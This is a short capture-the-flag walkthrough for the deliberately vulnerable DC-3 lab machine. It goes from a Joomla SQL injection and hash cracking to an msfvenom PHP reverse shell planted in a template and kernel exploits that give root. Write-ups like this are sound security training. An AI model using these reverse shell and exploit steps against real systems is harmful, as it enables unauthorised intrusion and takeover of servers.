DC-3
https://www.vulnhub.com/entry/dc-32,312/
DC-3 has 1 flag.
nmap scan:
hmm only one port open on this one. Well he did say there is only one flag.
I ran a nikto scan:
I went to http://10.6.6.20/administrator and a joomla login page is there.
Time to use msfconsole.
We see that Joomla version 3.7.0 is running. Search for that version with google or duckduckgo. Whatever search engine you use. Exploit-db is what you are looking for to exploit this.
You can use sqlmap to exploit this. There is also a script on github that does the same thing. Which is what I used.
I then used hashcat on my host machine to crack the hash.
Back to the login panel.
Cool. From here we should be able to upload a php reverse shell.
Make a reverse shell with msfvenom:
msfvenom -p php/meterpreter/reverse_tcp LHOST=kaliIP LPORT=1234 -f raw shell.php
Copy the output into index.php and save it.
Start msfconsole:
use exploit/multi/handler
set your lhost and lport
run and refresh the page and you will get a reverse shell.
I ran linpeas and didn't see anything about suid so moved on to kernel exploits.
The first exploit linpeas provided is dirtycow:
https://www.exploit-db.com/exploits/40839 didn't work. Crashed the system
https://www.exploit-db.com/exploits/40611 This one didn't work either.
https://www.exploit-db.com/exploits/39772
https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/linux/local/39772.txt#L127
This one worked! We need to download the zip file, unzip it, then untar the exploit.tar file, chmod +x compile.sh
./compile.sh
./doubleput
And we get root!
Sweet! Another box rooted. 6 more to go!
Last updated
Was this helpful?